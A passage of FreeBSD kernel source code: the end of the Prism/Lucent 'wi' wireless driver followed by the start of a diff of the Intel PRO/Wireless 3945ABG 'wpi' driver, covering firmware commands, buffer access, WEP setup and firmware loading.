{ if (wi_cmd(sc, WI_CMD_TX | WI_RECLAIM, sc->sc_txd[cur].d_fid, 0, 0)) { if_printf(ifp, "xmit failed\n"); sc->sc_txd[cur].d_len = 0; } else { sc->sc_tx_timer = 5; } } } static __noinline void wi_info_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int i, fid, len, off; u_int16_t ltbuf[2]; u_int16_t stat; u_int32_t *ptr; fid = CSR_READ_2(sc, WI_INFO_FID); wi_read_bap(sc, fid, 0, ltbuf, sizeof(ltbuf)); switch (le16toh(ltbuf[1])) { case WI_INFO_LINK_STAT: wi_read_bap(sc, fid, sizeof(ltbuf), &stat, sizeof(stat)); DPRINTF(("wi_info_intr: LINK_STAT 0x%x\n", le16toh(stat))); if (vap == NULL) goto finish; switch (le16toh(stat)) { case WI_INFO_LINK_STAT_CONNECTED: if (vap->iv_state == IEEE80211_S_RUN && vap->iv_opmode != IEEE80211_M_IBSS) break; /* fall thru... */ case WI_INFO_LINK_STAT_AP_CHG: IEEE80211_LOCK(ic); vap->iv_bss->ni_associd = 1 | 0xc000; /* NB: anything will do */ ieee80211_new_state(vap, IEEE80211_S_RUN, 0); IEEE80211_UNLOCK(ic); break; case WI_INFO_LINK_STAT_AP_INR: break; case WI_INFO_LINK_STAT_DISCONNECTED: /* we dropped off the net; e.g. due to deauth/disassoc */ IEEE80211_LOCK(ic); vap->iv_bss->ni_associd = 0; vap->iv_stats.is_rx_deauth++; ieee80211_new_state(vap, IEEE80211_S_SCAN, 0); IEEE80211_UNLOCK(ic); break; case WI_INFO_LINK_STAT_AP_OOR: /* XXX does this need to be per-vap? 
*/ ieee80211_beacon_miss(ic); break; case WI_INFO_LINK_STAT_ASSOC_FAILED: if (vap->iv_opmode == IEEE80211_M_STA) ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_TIMEOUT); break; } break; case WI_INFO_COUNTERS: /* some card versions have a larger stats structure */ len = min(le16toh(ltbuf[0]) - 1, sizeof(sc->sc_stats) / 4); ptr = (u_int32_t *)&sc->sc_stats; off = sizeof(ltbuf); for (i = 0; i < len; i++, off += 2, ptr++) { wi_read_bap(sc, fid, off, &stat, sizeof(stat)); #ifdef WI_HERMES_STATS_WAR if (stat & 0xf000) stat = ~stat; #endif *ptr += stat; } ifp->if_collisions = sc->sc_stats.wi_tx_single_retries + sc->sc_stats.wi_tx_multi_retries + sc->sc_stats.wi_tx_retry_limit; break; default: DPRINTF(("wi_info_intr: got fid %x type %x len %d\n", fid, le16toh(ltbuf[1]), le16toh(ltbuf[0]))); break; } finish: CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_INFO); } static int wi_write_multi(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int n; struct ifmultiaddr *ifma; struct wi_mcast mlist; if (ifp->if_flags & IFF_ALLMULTI || ifp->if_flags & IFF_PROMISC) { allmulti: memset(&mlist, 0, sizeof(mlist)); return wi_write_rid(sc, WI_RID_MCAST_LIST, &mlist, sizeof(mlist)); } n = 0; if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; if (n >= 16) goto allmulti; IEEE80211_ADDR_COPY(&mlist.wi_mcast[n], (LLADDR((struct sockaddr_dl *)ifma->ifma_addr))); n++; } if_maddr_runlock(ifp); return wi_write_rid(sc, WI_RID_MCAST_LIST, &mlist, IEEE80211_ADDR_LEN * n); } static void wi_update_mcast(struct ifnet *ifp) { wi_write_multi(ifp->if_softc); } static void wi_update_promisc(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); /* XXX handle WEP special case handling? 
*/ wi_write_val(sc, WI_RID_PROMISC, (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & IFF_PROMISC))); WI_UNLOCK(sc); } static void wi_read_nicid(struct wi_softc *sc) { struct wi_card_ident *id; char *p; int len; u_int16_t ver[4]; /* getting chip identity */ memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_CARD_ID, ver, &len); sc->sc_firmware_type = WI_NOTYPE; sc->sc_nic_id = le16toh(ver[0]); for (id = wi_card_ident; id->card_name != NULL; id++) { if (sc->sc_nic_id == id->card_id) { sc->sc_nic_name = id->card_name; sc->sc_firmware_type = id->firm_type; break; } } if (sc->sc_firmware_type == WI_NOTYPE) { if (sc->sc_nic_id & 0x8000) { sc->sc_firmware_type = WI_INTERSIL; sc->sc_nic_name = "Unknown Prism chip"; } else { sc->sc_firmware_type = WI_LUCENT; sc->sc_nic_name = "Unknown Lucent chip"; } } if (bootverbose) device_printf(sc->sc_dev, "using %s\n", sc->sc_nic_name); /* get primary firmware version (Only Prism chips) */ if (sc->sc_firmware_type != WI_LUCENT) { memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_PRI_IDENTITY, ver, &len); sc->sc_pri_firmware_ver = le16toh(ver[2]) * 10000 + le16toh(ver[3]) * 100 + le16toh(ver[1]); } /* get station firmware version */ memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_STA_IDENTITY, ver, &len); sc->sc_sta_firmware_ver = le16toh(ver[2]) * 10000 + le16toh(ver[3]) * 100 + le16toh(ver[1]); if (sc->sc_firmware_type == WI_INTERSIL && (sc->sc_sta_firmware_ver == 10102 || sc->sc_sta_firmware_ver == 20102)) { char ident[12]; memset(ident, 0, sizeof(ident)); len = sizeof(ident); /* value should be the format like "V2.00-11" */ if (wi_read_rid(sc, WI_RID_SYMBOL_IDENTITY, ident, &len) == 0 && *(p = (char *)ident) >= 'A' && p[2] == '.' && p[5] == '-' && p[8] == '\0') { sc->sc_firmware_type = WI_SYMBOL; sc->sc_sta_firmware_ver = (p[1] - '0') * 10000 + (p[3] - '0') * 1000 + (p[4] - '0') * 100 + (p[6] - '0') * 10 + (p[7] - '0'); } } if (bootverbose) { device_printf(sc->sc_dev, "%s Firmware: ", wi_firmware_names[sc->sc_firmware_type]); if (sc->sc_firmware_type != WI_LUCENT) /* XXX */ printf("Primary (%u.%u.%u), ", sc->sc_pri_firmware_ver / 10000, (sc->sc_pri_firmware_ver % 10000) / 100, sc->sc_pri_firmware_ver % 100); printf("Station (%u.%u.%u)\n", sc->sc_sta_firmware_ver / 10000, (sc->sc_sta_firmware_ver % 10000) / 100, sc->sc_sta_firmware_ver % 100); } } static int wi_write_ssid(struct wi_softc *sc, int rid, u_int8_t *buf, int buflen) { struct wi_ssid ssid; if (buflen > IEEE80211_NWID_LEN) return ENOBUFS; memset(&ssid, 0, sizeof(ssid)); ssid.wi_len = htole16(buflen); memcpy(ssid.wi_ssid, buf, buflen); return wi_write_rid(sc, rid, &ssid, sizeof(ssid)); } static int wi_write_txrate(struct wi_softc *sc, struct ieee80211vap *vap) { static const uint16_t lucent_rates[12] = { [ 0] = 3, /* auto */ [ 1] = 1, /* 1Mb/s */ [ 2] = 2, /* 2Mb/s */ [ 5] = 4, /* 5.5Mb/s */ [11] = 5 /* 11Mb/s */ }; static const uint16_t intersil_rates[12] = { [ 0] = 0xf, /* auto */ [ 1] = 0, /* 1Mb/s */ [ 2] = 1, /* 2Mb/s */ [ 5] = 2, /* 5.5Mb/s */ [11] = 3, /* 11Mb/s */ }; const uint16_t *rates = sc->sc_firmware_type == WI_LUCENT ? lucent_rates : intersil_rates; struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; return wi_write_val(sc, WI_RID_TX_RATE, (tp->ucastrate == IEEE80211_FIXED_RATE_NONE ? 
rates[0] : rates[tp->ucastrate / 2])); } static int wi_write_wep(struct wi_softc *sc, struct ieee80211vap *vap) { int error = 0; int i, keylen; u_int16_t val; struct wi_key wkey[IEEE80211_WEP_NKID]; switch (sc->sc_firmware_type) { case WI_LUCENT: val = (vap->iv_flags & IEEE80211_F_PRIVACY) ? 1 : 0; error = wi_write_val(sc, WI_RID_ENCRYPTION, val); if (error) break; if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) break; error = wi_write_val(sc, WI_RID_TX_CRYPT_KEY, vap->iv_def_txkey); if (error) break; memset(wkey, 0, sizeof(wkey)); for (i = 0; i < IEEE80211_WEP_NKID; i++) { keylen = vap->iv_nw_keys[i].wk_keylen; wkey[i].wi_keylen = htole16(keylen); memcpy(wkey[i].wi_keydat, vap->iv_nw_keys[i].wk_key, keylen); } error = wi_write_rid(sc, WI_RID_DEFLT_CRYPT_KEYS, wkey, sizeof(wkey)); sc->sc_encryption = 0; break; case WI_INTERSIL: val = HOST_ENCRYPT | HOST_DECRYPT; if (vap->iv_flags & IEEE80211_F_PRIVACY) { /* * ONLY HWB3163 EVAL-CARD Firmware version * less than 0.8 variant2 * * If promiscuous mode disable, Prism2 chip * does not work with WEP . * It is under investigation for details. * (ichiro@netbsd.org) */ if (sc->sc_sta_firmware_ver < 802 ) { /* firm ver < 0.8 variant 2 */ wi_write_val(sc, WI_RID_PROMISC, 1); } wi_write_val(sc, WI_RID_CNFAUTHMODE, vap->iv_bss->ni_authmode); val |= PRIVACY_INVOKED; } else { wi_write_val(sc, WI_RID_CNFAUTHMODE, IEEE80211_AUTH_OPEN); } error = wi_write_val(sc, WI_RID_P2_ENCRYPTION, val); if (error) break; sc->sc_encryption = val; if ((val & PRIVACY_INVOKED) == 0) break; error = wi_write_val(sc, WI_RID_P2_TX_CRYPT_KEY, vap->iv_def_txkey); break; } return error; } static int wi_cmd(struct wi_softc *sc, int cmd, int val0, int val1, int val2) { int i, s = 0; if (sc->wi_gone) return (ENODEV); /* wait for the busy bit to clear */ for (i = sc->wi_cmd_count; i > 0; i--) { /* 500ms */ if (!(CSR_READ_2(sc, WI_COMMAND) & WI_CMD_BUSY)) break; DELAY(1*1000); /* 1ms */ } if (i == 0) { device_printf(sc->sc_dev, "%s: busy bit won't clear, cmd 0x%x\n", __func__, cmd); sc->wi_gone = 1; return(ETIMEDOUT); } CSR_WRITE_2(sc, WI_PARAM0, val0); CSR_WRITE_2(sc, WI_PARAM1, val1); CSR_WRITE_2(sc, WI_PARAM2, val2); CSR_WRITE_2(sc, WI_COMMAND, cmd); if (cmd == WI_CMD_INI) { /* XXX: should sleep here. */ DELAY(100*1000); /* 100ms delay for init */ } for (i = 0; i < WI_TIMEOUT; i++) { /* * Wait for 'command complete' bit to be * set in the event status register. */ s = CSR_READ_2(sc, WI_EVENT_STAT); if (s & WI_EV_CMD) { /* Ack the event and read result code. 
*/ s = CSR_READ_2(sc, WI_STATUS); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_CMD); if (s & WI_STAT_CMD_RESULT) { return(EIO); } break; } DELAY(WI_DELAY); } if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout on cmd 0x%04x; " "event status 0x%04x\n", __func__, cmd, s); if (s == 0xffff) sc->wi_gone = 1; return(ETIMEDOUT); } return (0); } static int wi_seek_bap(struct wi_softc *sc, int id, int off) { int i, status; CSR_WRITE_2(sc, WI_SEL0, id); CSR_WRITE_2(sc, WI_OFF0, off); for (i = 0; ; i++) { status = CSR_READ_2(sc, WI_OFF0); if ((status & WI_OFF_BUSY) == 0) break; if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout, id %x off %x\n", __func__, id, off); sc->sc_bap_off = WI_OFF_ERR; /* invalidate */ if (status == 0xffff) sc->wi_gone = 1; return ETIMEDOUT; } DELAY(1); } if (status & WI_OFF_ERR) { device_printf(sc->sc_dev, "%s: error, id %x off %x\n", __func__, id, off); sc->sc_bap_off = WI_OFF_ERR; /* invalidate */ return EIO; } sc->sc_bap_id = id; sc->sc_bap_off = off; return 0; } static int wi_read_bap(struct wi_softc *sc, int id, int off, void *buf, int buflen) { int error, cnt; if (buflen == 0) return 0; if (id != sc->sc_bap_id || off != sc->sc_bap_off) { if ((error = wi_seek_bap(sc, id, off)) != 0) return error; } cnt = (buflen + 1) / 2; CSR_READ_MULTI_STREAM_2(sc, WI_DATA0, (u_int16_t *)buf, cnt); sc->sc_bap_off += cnt * 2; return 0; } static int wi_write_bap(struct wi_softc *sc, int id, int off, void *buf, int buflen) { int error, cnt; if (buflen == 0) return 0; if (id != sc->sc_bap_id || off != sc->sc_bap_off) { if ((error = wi_seek_bap(sc, id, off)) != 0) return error; } cnt = (buflen + 1) / 2; CSR_WRITE_MULTI_STREAM_2(sc, WI_DATA0, (u_int16_t *)buf, cnt); sc->sc_bap_off += cnt * 2; return 0; } static int wi_mwrite_bap(struct wi_softc *sc, int id, int off, struct mbuf *m0, int totlen) { int error, len; struct mbuf *m; for (m = m0; m != NULL && totlen > 0; m = m->m_next) { if (m->m_len == 0) continue; len = min(m->m_len, totlen); if (((u_long)m->m_data) % 2 != 0 || len % 2 != 0) { m_copydata(m, 0, totlen, (caddr_t)&sc->sc_txbuf); return wi_write_bap(sc, id, off, (caddr_t)&sc->sc_txbuf, totlen); } if ((error = wi_write_bap(sc, id, off, m->m_data, len)) != 0) return error; off += m->m_len; totlen -= len; } return 0; } static int wi_alloc_fid(struct wi_softc *sc, int len, int *idp) { int i; if (wi_cmd(sc, WI_CMD_ALLOC_MEM, len, 0, 0)) { device_printf(sc->sc_dev, "%s: failed to allocate %d bytes on NIC\n", __func__, len); return ENOMEM; } for (i = 0; i < WI_TIMEOUT; i++) { if (CSR_READ_2(sc, WI_EVENT_STAT) & WI_EV_ALLOC) break; DELAY(1); } if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout in alloc\n", __func__); return ETIMEDOUT; } *idp = CSR_READ_2(sc, WI_ALLOC_FID); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_ALLOC); return 0; } static int wi_read_rid(struct wi_softc *sc, int rid, void *buf, int *buflenp) { int error, len; u_int16_t ltbuf[2]; /* Tell the NIC to enter record read mode. 
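 * A RID is fetched by issuing WI_CMD_ACCESS/WI_ACCESS_READ and then pulling a two-word header through the BAP (a length in 16-bit words that includes the RID word, followed by the RID itself) before reading the payload.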
*/ error = wi_cmd(sc, WI_CMD_ACCESS | WI_ACCESS_READ, rid, 0, 0); if (error) return error; error = wi_read_bap(sc, rid, 0, ltbuf, sizeof(ltbuf)); if (error) return error; if (le16toh(ltbuf[1]) != rid) { device_printf(sc->sc_dev, "record read mismatch, rid=%x, got=%x\n", rid, le16toh(ltbuf[1])); return EIO; } len = (le16toh(ltbuf[0]) - 1) * 2; /* already got rid */ if (*buflenp < len) { device_printf(sc->sc_dev, "record buffer is too small, " "rid=%x, size=%d, len=%d\n", rid, *buflenp, len); return ENOSPC; } *buflenp = len; return wi_read_bap(sc, rid, sizeof(ltbuf), buf, len); } static int wi_write_rid(struct wi_softc *sc, int rid, void *buf, int buflen) { int error; u_int16_t ltbuf[2]; ltbuf[0] = htole16((buflen + 1) / 2 + 1); /* includes rid */ ltbuf[1] = htole16(rid); error = wi_write_bap(sc, rid, 0, ltbuf, sizeof(ltbuf)); if (error) { device_printf(sc->sc_dev, "%s: bap0 write failure, rid 0x%x\n", __func__, rid); return error; } error = wi_write_bap(sc, rid, sizeof(ltbuf), buf, buflen); if (error) { device_printf(sc->sc_dev, "%s: bap1 write failure, rid 0x%x\n", __func__, rid); return error; } return wi_cmd(sc, WI_CMD_ACCESS | WI_ACCESS_WRITE, rid, 0, 0); } static int wi_write_appie(struct wi_softc *sc, int rid, const struct ieee80211_appie *ie) { /* NB: 42 bytes is probably ok to have on the stack */ char buf[sizeof(uint16_t) + 40]; if (ie->ie_len > 40) return EINVAL; /* NB: firmware requires 16-bit ie length before ie data */ *(uint16_t *) buf = htole16(ie->ie_len); memcpy(buf + sizeof(uint16_t), ie->ie_data, ie->ie_len); return wi_write_rid(sc, rid, buf, ie->ie_len + sizeof(uint16_t)); } int wi_alloc(device_t dev, int rid) { struct wi_softc *sc = device_get_softc(dev); if (sc->wi_bus_type != WI_BUS_PCI_NATIVE) { sc->iobase_rid = rid; sc->iobase = bus_alloc_resource(dev, SYS_RES_IOPORT, &sc->iobase_rid, 0, ~0, (1 << 6), rman_make_alignment_flags(1 << 6) | RF_ACTIVE); if (sc->iobase == NULL) { device_printf(dev, "No I/O space?!\n"); return ENXIO; } sc->wi_io_addr = rman_get_start(sc->iobase); sc->wi_btag = rman_get_bustag(sc->iobase); sc->wi_bhandle = rman_get_bushandle(sc->iobase); } else { sc->mem_rid = rid; sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &sc->mem_rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "No Mem space on prism2.5?\n"); return ENXIO; } sc->wi_btag = rman_get_bustag(sc->mem); sc->wi_bhandle = rman_get_bushandle(sc->mem); } sc->irq_rid = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &sc->irq_rid, RF_ACTIVE | ((sc->wi_bus_type == WI_BUS_PCCARD) ? 
0 : RF_SHAREABLE)); if (sc->irq == NULL) { wi_free(dev); device_printf(dev, "No irq?!\n"); return ENXIO; } sc->sc_dev = dev; sc->sc_unit = device_get_unit(dev); return 0; } void wi_free(device_t dev) { struct wi_softc *sc = device_get_softc(dev); if (sc->iobase != NULL) { bus_release_resource(dev, SYS_RES_IOPORT, sc->iobase_rid, sc->iobase); sc->iobase = NULL; } if (sc->irq != NULL) { bus_release_resource(dev, SYS_RES_IRQ, sc->irq_rid, sc->irq); sc->irq = NULL; } if (sc->mem != NULL) { bus_release_resource(dev, SYS_RES_MEMORY, sc->mem_rid, sc->mem); sc->mem = NULL; } } diff --git a/sys/dev/wpi/if_wpi.c b/sys/dev/wpi/if_wpi.c index 6f43addb117e..e85e079306ce 100644 --- a/sys/dev/wpi/if_wpi.c +++ b/sys/dev/wpi/if_wpi.c @@ -1,3716 +1,3716 @@ /*- * Copyright (c) 2006,2007 * Damien Bergamini * Benjamin Close * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #define VERSION "20071127" #include __FBSDID("$FreeBSD$"); /* * Driver for Intel PRO/Wireless 3945ABG 802.11 network adapters. * * The 3945ABG network adapter doesn't use traditional hardware as * many other adapters do. Instead, at run time the eeprom is set into a known * state and told to load boot firmware. The boot firmware loads an init and a * main binary firmware image into SRAM on the card via DMA. * Once the firmware is loaded, the driver/hw then * communicate by way of circular dma rings via the SRAM to the firmware. * * There are 6 memory rings: 1 command ring, 1 rx data ring & 4 tx data rings. * The 4 tx data rings allow for QoS prioritization. * * The rx data ring consists of 32 dma buffers. Two registers are used to * indicate where in the ring the driver and the firmware are up to. The * driver sets the initial read index (reg1) and the initial write index (reg2), * the firmware updates the read index (reg1) on rx of a packet and fires an * interrupt. The driver then processes the buffers starting at reg1, indicating * to the firmware which buffers have been accessed by updating reg2. At the * same time it allocates new memory for the processed buffer. * * A similar thing happens with the tx rings. The difference is that the firmware * stops processing buffers once the queue is full, until confirmation * of a successful transmission (tx_intr) has occurred. * * The command ring operates in the same manner as the tx queues. * * All communication direct to the card (ie eeprom) is classed as Stage1 * communication. * * All communication via the firmware to the card is classed as Stage2. * The firmware consists of 2 parts: a bootstrap firmware and a runtime * firmware. The bootstrap firmware and runtime firmware are loaded * from host memory via dma to the card and then told to execute. From this point * on the majority of communications between the driver and the card goes * via the firmware.
*/ #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define WPI_DEBUG #ifdef WPI_DEBUG #define DPRINTF(x) do { if (wpi_debug != 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (wpi_debug & n) printf x; } while (0) #define WPI_DEBUG_SET (wpi_debug != 0) enum { WPI_DEBUG_UNUSED = 0x00000001, /* Unused */ WPI_DEBUG_HW = 0x00000002, /* Stage 1 (eeprom) debugging */ WPI_DEBUG_TX = 0x00000004, /* Stage 2 TX intrp debugging*/ WPI_DEBUG_RX = 0x00000008, /* Stage 2 RX intrp debugging */ WPI_DEBUG_CMD = 0x00000010, /* Stage 2 CMD intrp debugging*/ WPI_DEBUG_FIRMWARE = 0x00000020, /* firmware(9) loading debug */ WPI_DEBUG_DMA = 0x00000040, /* DMA (de)allocations/syncs */ WPI_DEBUG_SCANNING = 0x00000080, /* Stage 2 Scanning debugging */ WPI_DEBUG_NOTIFY = 0x00000100, /* State 2 Noftif intr debug */ WPI_DEBUG_TEMP = 0x00000200, /* TXPower/Temp Calibration */ WPI_DEBUG_OPS = 0x00000400, /* wpi_ops taskq debug */ WPI_DEBUG_WATCHDOG = 0x00000800, /* Watch dog debug */ WPI_DEBUG_ANY = 0xffffffff }; static int wpi_debug = 0; SYSCTL_INT(_debug, OID_AUTO, wpi, CTLFLAG_RW, &wpi_debug, 0, "wpi debug level"); TUNABLE_INT("debug.wpi", &wpi_debug); #else #define DPRINTF(x) #define DPRINTFN(n, x) #define WPI_DEBUG_SET 0 #endif struct wpi_ident { uint16_t vendor; uint16_t device; uint16_t subdevice; const char *name; }; static const struct wpi_ident wpi_ident_table[] = { /* The below entries support ABG regardless of the subid */ { 0x8086, 0x4222, 0x0, "Intel(R) PRO/Wireless 3945ABG" }, { 0x8086, 0x4227, 0x0, "Intel(R) PRO/Wireless 3945ABG" }, /* The below entries only support BG */ { 0x8086, 0x4222, 0x1005, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4222, 0x1034, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4227, 0x1014, "Intel(R) PRO/Wireless 3945BG" }, { 0x8086, 0x4222, 0x1044, "Intel(R) PRO/Wireless 3945BG" }, { 0, 0, 0, NULL } }; static struct ieee80211vap *wpi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void wpi_vap_delete(struct ieee80211vap *); static int wpi_dma_contig_alloc(struct wpi_softc *, struct wpi_dma_info *, void **, bus_size_t, bus_size_t, int); static void wpi_dma_contig_free(struct wpi_dma_info *); static void wpi_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int wpi_alloc_shared(struct wpi_softc *); static void wpi_free_shared(struct wpi_softc *); static int wpi_alloc_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static void wpi_reset_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static void wpi_free_rx_ring(struct wpi_softc *, struct wpi_rx_ring *); static int wpi_alloc_tx_ring(struct wpi_softc *, struct wpi_tx_ring *, int, int); static void wpi_reset_tx_ring(struct wpi_softc *, struct wpi_tx_ring *); static void wpi_free_tx_ring(struct wpi_softc *, struct wpi_tx_ring *); static int wpi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void wpi_mem_lock(struct wpi_softc *); static void wpi_mem_unlock(struct wpi_softc *); static uint32_t wpi_mem_read(struct wpi_softc *, uint16_t); static void wpi_mem_write(struct wpi_softc *, uint16_t, uint32_t); static void wpi_mem_write_region_4(struct wpi_softc *, 
uint16_t, const uint32_t *, int); static uint16_t wpi_read_prom_data(struct wpi_softc *, uint32_t, void *, int); static int wpi_alloc_fwmem(struct wpi_softc *); static void wpi_free_fwmem(struct wpi_softc *); static int wpi_load_firmware(struct wpi_softc *); static void wpi_unload_firmware(struct wpi_softc *); static int wpi_load_microcode(struct wpi_softc *, const uint8_t *, int); static void wpi_rx_intr(struct wpi_softc *, struct wpi_rx_desc *, struct wpi_rx_data *); static void wpi_tx_intr(struct wpi_softc *, struct wpi_rx_desc *); static void wpi_cmd_intr(struct wpi_softc *, struct wpi_rx_desc *); static void wpi_notif_intr(struct wpi_softc *); static void wpi_intr(void *); static uint8_t wpi_plcp_signal(int); static void wpi_watchdog(void *); static int wpi_tx_data(struct wpi_softc *, struct mbuf *, struct ieee80211_node *, int); static void wpi_start(struct ifnet *); static void wpi_start_locked(struct ifnet *); static int wpi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void wpi_scan_start(struct ieee80211com *); static void wpi_scan_end(struct ieee80211com *); static void wpi_set_channel(struct ieee80211com *); static void wpi_scan_curchan(struct ieee80211_scan_state *, unsigned long); static void wpi_scan_mindwell(struct ieee80211_scan_state *); static int wpi_ioctl(struct ifnet *, u_long, caddr_t); static void wpi_read_eeprom(struct wpi_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static void wpi_read_eeprom_channels(struct wpi_softc *, int); static void wpi_read_eeprom_group(struct wpi_softc *, int); static int wpi_cmd(struct wpi_softc *, int, const void *, int, int); static int wpi_wme_update(struct ieee80211com *); static int wpi_mrr_setup(struct wpi_softc *); static void wpi_set_led(struct wpi_softc *, uint8_t, uint8_t, uint8_t); static void wpi_enable_tsf(struct wpi_softc *, struct ieee80211_node *); #if 0 static int wpi_setup_beacon(struct wpi_softc *, struct ieee80211_node *); #endif static int wpi_auth(struct wpi_softc *, struct ieee80211vap *); static int wpi_run(struct wpi_softc *, struct ieee80211vap *); static int wpi_scan(struct wpi_softc *); static int wpi_config(struct wpi_softc *); static void wpi_stop_master(struct wpi_softc *); static int wpi_power_up(struct wpi_softc *); static int wpi_reset(struct wpi_softc *); static void wpi_hwreset(void *, int); static void wpi_rfreset(void *, int); static void wpi_hw_config(struct wpi_softc *); static void wpi_init(void *); static void wpi_init_locked(struct wpi_softc *, int); static void wpi_stop(struct wpi_softc *); static void wpi_stop_locked(struct wpi_softc *); static int wpi_set_txpower(struct wpi_softc *, struct ieee80211_channel *, int); static void wpi_calib_timeout(void *); static void wpi_power_calibration(struct wpi_softc *, int); static int wpi_get_power_index(struct wpi_softc *, struct wpi_power_group *, struct ieee80211_channel *, int); #ifdef WPI_DEBUG static const char *wpi_cmd_str(int); #endif static int wpi_probe(device_t); static int wpi_attach(device_t); static int wpi_detach(device_t); static int wpi_shutdown(device_t); static int wpi_suspend(device_t); static int wpi_resume(device_t); static device_method_t wpi_methods[] = { /* Device interface */ DEVMETHOD(device_probe, wpi_probe), DEVMETHOD(device_attach, wpi_attach), DEVMETHOD(device_detach, wpi_detach), DEVMETHOD(device_shutdown, wpi_shutdown), DEVMETHOD(device_suspend, wpi_suspend), DEVMETHOD(device_resume, wpi_resume), DEVMETHOD_END }; static driver_t wpi_driver = { "wpi", wpi_methods, sizeof 
(struct wpi_softc) }; static devclass_t wpi_devclass; DRIVER_MODULE(wpi, pci, wpi_driver, wpi_devclass, NULL, NULL); MODULE_VERSION(wpi, 1); static const uint8_t wpi_ridx_to_plcp[] = { /* OFDM: IEEE Std 802.11a-1999, pp. 14 Table 80 */ /* R1-R4 (ral/ural is R4-R1) */ 0xd, 0xf, 0x5, 0x7, 0x9, 0xb, 0x1, 0x3, /* CCK: device-dependent */ 10, 20, 55, 110 }; static const uint8_t wpi_ridx_to_rate[] = { 12, 18, 24, 36, 48, 72, 96, 108, /* OFDM */ 2, 4, 11, 22 /*CCK */ }; static int wpi_probe(device_t dev) { const struct wpi_ident *ident; for (ident = wpi_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } /** * Load the firmare image from disk to the allocated dma buffer. * we also maintain the reference to the firmware pointer as there * is times where we may need to reload the firmware but we are not * in a context that can access the filesystem (ie taskq cause by restart) * * @return 0 on success, an errno on failure */ static int wpi_load_firmware(struct wpi_softc *sc) { const struct firmware *fp; struct wpi_dma_info *dma = &sc->fw_dma; const struct wpi_firmware_hdr *hdr; const uint8_t *itext, *idata, *rtext, *rdata, *btext; uint32_t itextsz, idatasz, rtextsz, rdatasz, btextsz; int error; DPRINTFN(WPI_DEBUG_FIRMWARE, ("Attempting Loading Firmware from wpi_fw module\n")); WPI_UNLOCK(sc); if (sc->fw_fp == NULL && (sc->fw_fp = firmware_get("wpifw")) == NULL) { device_printf(sc->sc_dev, "could not load firmware image 'wpifw'\n"); error = ENOENT; WPI_LOCK(sc); goto fail; } fp = sc->fw_fp; WPI_LOCK(sc); /* Validate the firmware is minimum a particular version */ if (fp->version < WPI_FW_MINVERSION) { device_printf(sc->sc_dev, "firmware version is too old. Need %d, got %d\n", WPI_FW_MINVERSION, fp->version); error = ENXIO; goto fail; } if (fp->datasize < sizeof (struct wpi_firmware_hdr)) { device_printf(sc->sc_dev, "firmware file too short: %zu bytes\n", fp->datasize); error = ENXIO; goto fail; } hdr = (const struct wpi_firmware_hdr *)fp->data; /* | RUNTIME FIRMWARE | INIT FIRMWARE | BOOT FW | |HDR|<--TEXT-->|<--DATA-->|<--TEXT-->|<--DATA-->|<--TEXT-->| */ rtextsz = le32toh(hdr->rtextsz); rdatasz = le32toh(hdr->rdatasz); itextsz = le32toh(hdr->itextsz); idatasz = 